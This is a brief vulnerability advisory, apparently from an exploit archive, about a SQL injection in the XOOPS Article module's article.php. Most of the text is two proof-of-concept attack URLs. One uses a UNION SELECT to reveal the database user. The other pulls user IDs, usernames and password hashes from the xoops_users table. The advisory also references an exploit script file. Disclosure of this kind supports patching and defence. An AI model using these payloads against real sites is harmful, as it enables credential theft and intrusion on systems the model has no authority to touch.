XOOPS Article Module 'article.php' SQL Injection Vulnerability

XOOPS Article Module 'article.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs and exploit are available:

http://www.example.com/modules/dictionary/article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*
http://www.example.com/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

/data/vulnerabilities/exploits/28879.py